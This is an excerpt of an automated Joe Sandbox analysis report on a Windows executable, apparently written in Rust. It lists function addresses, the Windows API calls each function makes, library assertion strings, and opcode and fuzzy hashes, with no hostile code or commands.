                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1745 7ff79e9086c0-7ff79e9086fb call 7ff79e94aae0 CloseHandle * 2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$OverlappedResult
                                                                                                        • String ID:
                                                                                                        • API String ID: 953004297-0
                                                                                                        • Opcode ID: bc95dc34ded0c11d629d39e19242659bc9fbb7d9afb6adea63d6e47460e0621b
                                                                                                        • Instruction ID: 68055e9f1a3ff131b246ea9906551e92f49bf1af63a4840d66ad1637e81d7ed4
                                                                                                        • Opcode Fuzzy Hash: bc95dc34ded0c11d629d39e19242659bc9fbb7d9afb6adea63d6e47460e0621b
                                                                                                        • Instruction Fuzzy Hash: C4E08603B0495193F630F672F4915BA9760AB887A0F445430DF4E07B86AD2CE881C730
                                                                                                        Function 00007FF79E8F3FE8 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeTask
                                                                                                        • String ID:
                                                                                                        • API String ID: 734271698-0
                                                                                                        • Opcode ID: 5e28ae5984b5a976e60f91431f0f2898fac32a5e4daf1d6606d5b4610ef5faf6
                                                                                                        • Instruction ID: 0585370c2162ba9d298737e8367155bb4669a7233be4f3909e485219e226b7b6
                                                                                                        • Opcode Fuzzy Hash: 5e28ae5984b5a976e60f91431f0f2898fac32a5e4daf1d6606d5b4610ef5faf6
                                                                                                        • Instruction Fuzzy Hash: A0F0B422A0828642FB34BA77A9D23BE5314AFC4BD0F849530DE4C0B746DE2CD5528731
                                                                                                        Function 00007FF79E8F1FB8 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: f2f5c35075f2f48801c1458dab8b9eb17e993285bd788fdcbcbcfbd1718489e8
                                                                                                        • Instruction ID: 70395792f761b9285ab20ebd36695bcc9f889a86f79e76be1e6ad6c5c78db9b4
                                                                                                        • Opcode Fuzzy Hash: f2f5c35075f2f48801c1458dab8b9eb17e993285bd788fdcbcbcfbd1718489e8
                                                                                                        • Instruction Fuzzy Hash: 09F0F02331475082EA10EB27994475AAB60BB85FE0F848431AF0D07F85CE3CD0A29720
                                                                                                        Function 00007FF79E92BCB5 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$FileObjectSingleWaitWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1197516534-0
                                                                                                        • Opcode ID: cf5330738513c44e6bf907616ce4be60987f62dffa7346951f1390b77bb85e6f
                                                                                                        • Instruction ID: 5617334989d4244ca1414567de227bbeb3be675e18b26d82a03a0acf5b446b2e
                                                                                                        • Opcode Fuzzy Hash: cf5330738513c44e6bf907616ce4be60987f62dffa7346951f1390b77bb85e6f
                                                                                                        • Instruction Fuzzy Hash: 55F0B412F0E50644EE77F339699127DD3956F48BF8A890832CE0D07B85EE3C948243B2
                                                                                                        Function 00007FF79E94FC75 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1794 7ff79e94fc75-7ff79e94fc82 call 7ff79e9494d0 1796 7ff79e94fc87-7ff79e94fc90 1794->1796 1797 7ff79e94fdc6-7ff79e94fdd1 1796->1797 1798 7ff79e94fc96-7ff79e94fc9e 1796->1798 1801 7ff79e94fdd3-7ff79e94fddc CloseHandle 1797->1801 1802 7ff79e94fddf-7ff79e94fdea 1797->1802 1799 7ff79e94fd23-7ff79e94fd37 1798->1799 1800 7ff79e94fd21 1798->1800 1800->1799 1801->1802 1802->1800
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseCurrentHandlePrng
                                                                                                        • String ID:
                                                                                                        • API String ID: 842889843-0
                                                                                                        • Opcode ID: 650037822f8cbc376a3359490cc51f223ff582ef4b2441960000a9da0122dd77
                                                                                                        • Instruction ID: 064f3a7a5561893b57ae7e61acf9e318833384df317362a1fa5601dd10ac2f90
                                                                                                        • Opcode Fuzzy Hash: 650037822f8cbc376a3359490cc51f223ff582ef4b2441960000a9da0122dd77
                                                                                                        • Instruction Fuzzy Hash: BDF01D2360466645E761AB35E9903A8A391AB44BFCF495531DA0C47BD5EF3CE8C28321

                                                                                                        Non-executed Functions

                                                                                                        Function 00007FF79E957770 Relevance: 43.2, APIs: 21, Strings: 2, Instructions: 2950COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types, xrefs: 00007FF79E958A37
                                                                                                        • .debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF79E95B379
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs
                                                                                                        • API String ID: 3510742995-4060794284
                                                                                                        • Opcode ID: ce812585d2255ee4de85a84ae481b675690a402de59ca8b2b0c31548b965d5d5
                                                                                                        • Instruction ID: 054a298d48ac68a450b5e2367cb1557e4e7e9e85e5d3ec274eee67f28101110a
                                                                                                        • Opcode Fuzzy Hash: ce812585d2255ee4de85a84ae481b675690a402de59ca8b2b0c31548b965d5d5
                                                                                                        • Instruction Fuzzy Hash: F5733B32605BC588EBB09F39D8907E973A0FB45798F904236CE4D4BB99DF389295C361
                                                                                                        Function 00007FF79E97FE00 Relevance: 33.5, APIs: 14, Strings: 7, Instructions: 1978COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
                                                                                                        • API String ID: 3510742995-655871377
                                                                                                        • Opcode ID: 5d081643fb6db21f6007eb400b0911027432dab106373f68406d0cb7b2d26220
                                                                                                        • Instruction ID: e6f2a7a5cc2e2be0dfffe47735deb4b8a4e86794ede683c375de2d76d4aa03cf
                                                                                                        • Opcode Fuzzy Hash: 5d081643fb6db21f6007eb400b0911027432dab106373f68406d0cb7b2d26220
                                                                                                        • Instruction Fuzzy Hash: B80304A2A086828AFB74EF31D8907F96350FB557ACF805235DA0D17BA5DF3D66808331
                                                                                                        Function 00007FF79E97FFF0 Relevance: 23.1, APIs: 6, Strings: 9, Instructions: 585COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs
                                                                                                        • API String ID: 0-3544694999
                                                                                                        • Opcode ID: 79376c6c0be819ca5d3616991f86a7ced4d1cfdc7bbbdc0e5876d4f0e02be714
                                                                                                        • Instruction ID: 05f7346a6cc0d286824eb35743b20511523efb2b2e22b3da2879b96c041aa09b
                                                                                                        • Opcode Fuzzy Hash: 79376c6c0be819ca5d3616991f86a7ced4d1cfdc7bbbdc0e5876d4f0e02be714
                                                                                                        • Instruction Fuzzy Hash: AF42F5A2E096C28AFB30DF3189907F96360FB557ACF805235DA5D17AE5CF7866818331
                                                                                                        Function 00007FF79E953AA0 Relevance: 21.8, APIs: 14, Instructions: 810COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0a51d79f36a4b625d5daad74d693dc1564e18173d3cd8f5a3e89b05dea94e59
                                                                                                        • Instruction ID: a0c0cc763f173d7d7f1a1cee1a0ebb95bfd6c4f7502d0cb245a7d11c0c1bb33f
                                                                                                        • Opcode Fuzzy Hash: f0a51d79f36a4b625d5daad74d693dc1564e18173d3cd8f5a3e89b05dea94e59
                                                                                                        • Instruction Fuzzy Hash: A66246A2A0C6D245FB71EB3598847B9E791AB11BB4F944131CE6E077D6CE3CE5818332
                                                                                                        Function 00007FF79E9A5CE0 Relevance: 16.7, APIs: 1, Strings: 8, Instructions: 950COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _assert
                                                                                                        • String ID: $(cur_match_len >= TDEFL_MIN_MATCH_LEN) && (cur_match_dist >= 1) && (cur_match_dist <= TDEFL_LZ_DICT_SIZE)$(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)$0$d->m_lookahead_size >= len_to_move$lookahead_size >= cur_match_len$max_match_len <= TDEFL_MAX_MATCH_LEN$miniz.c
                                                                                                        • API String ID: 1222420520-709428966
                                                                                                        • Opcode ID: 04a39aedaf04f6f151b943eec858ecf83e37a50d2575af202dce6b83d8f278e9
                                                                                                        • Instruction ID: afa639c594ee9c72279d9b4e21eb01e49bea2655c33652669cf88e751f76a2b7
                                                                                                        • Opcode Fuzzy Hash: 04a39aedaf04f6f151b943eec858ecf83e37a50d2575af202dce6b83d8f278e9
                                                                                                        • Instruction Fuzzy Hash: 2992F073A1869286E7749F38D08077DBBA1FF40B58F948135DA8A47689DF3CE885C721
                                                                                                        Function 00007FF79E9440F0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 302fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$Find$CloseErrorFileFirstLastmemset
                                                                                                        • String ID: *\\?\\??\:\\\.\\\path is not valid
                                                                                                        • API String ID: 3412300865-1181881060
                                                                                                        • Opcode ID: 33443f6899e1fdf60af055cc351df934df5838fda767555b26b954e47405b89d
                                                                                                        • Instruction ID: 0c5872caef0cb5f43ce2dd96a31b33f6382e0d26220acd4dbbd9fcc222cec542
                                                                                                        • Opcode Fuzzy Hash: 33443f6899e1fdf60af055cc351df934df5838fda767555b26b954e47405b89d
                                                                                                        • Instruction Fuzzy Hash: 33C1DF62B086A144FB70AB7198953BDA7A6BF44BE8F804531CD5C0BBCADE3DE5418371
                                                                                                        Function 00007FF79E96D671 Relevance: 15.2, Strings: 12, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: mxcs$xmm1$xmm1$xmm1$xmm1$xmm1$xmm2$xmm2$xmm2$xmm2$xmm2$xmm3
                                                                                                        • API String ID: 0-1236548232
                                                                                                        • Opcode ID: 282c2ecf0a13b10417f98fcc2de153ca1e2f6ae0caace3dd0a504f6b69fb5534
                                                                                                        • Instruction ID: aea23d5fe1fa722dd5408b4fcd2e7bd5fb3fa58844c6be0f49c21a020494a392
                                                                                                        • Opcode Fuzzy Hash: 282c2ecf0a13b10417f98fcc2de153ca1e2f6ae0caace3dd0a504f6b69fb5534
                                                                                                        • Instruction Fuzzy Hash: 08711E22E1C4964AE370BA355490B39AFE2EB9BF547E4D033C11946AD8C97F9402F772
                                                                                                        Function 00007FF79E947170 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 293COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleFileHandleInformationModememcpymemset
                                                                                                        • String ID: -pty$cygw$msys$win-
                                                                                                        • API String ID: 4206110311-1440016460
                                                                                                        • Opcode ID: 5b7725837cd16be9d7651fe7001e6393701df8f01cea7ab11087e54921fc731e
                                                                                                        • Instruction ID: 241183190de1b17c25e52016643f7797a689fe7ee2c1fe5406ead64e01145c6e
                                                                                                        • Opcode Fuzzy Hash: 5b7725837cd16be9d7651fe7001e6393701df8f01cea7ab11087e54921fc731e
                                                                                                        • Instruction Fuzzy Hash: 74B13662B092E649FB74AA71C8903FD6752EB407A8F844435DE1D0BBCAEE7C9145C332
                                                                                                        Function 00007FF79E957140 Relevance: 13.8, APIs: 9, Instructions: 298fileprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$FileModule32UnmapView$CreateFirstNextSnapshotToolhelp32memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2278125577-0
                                                                                                        • Opcode ID: 4dae5c928eef5ef34d3505b5a4e97b6ff81de2f543ef1c370045337e584a2e2b
                                                                                                        • Instruction ID: fd04391ffa03ca204d81256e8ead50ed7c24c317c1063865f65a3163e42079da
                                                                                                        • Opcode Fuzzy Hash: 4dae5c928eef5ef34d3505b5a4e97b6ff81de2f543ef1c370045337e584a2e2b
                                                                                                        • Instruction Fuzzy Hash: 79E19462A09BC189EB70AF35D8803FCA361FB447A8F844135DE5D1B795DF38A6858331
                                                                                                        Function 00007FF79E97B9B0 Relevance: 13.1, APIs: 5, Strings: 3, Instructions: 1128COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • called `Result::unwrap()` on an `Err` valueErrorLayoutError, xrefs: 00007FF79E97BBAF
                                                                                                        • capacity overflow, xrefs: 00007FF79E97C9B7
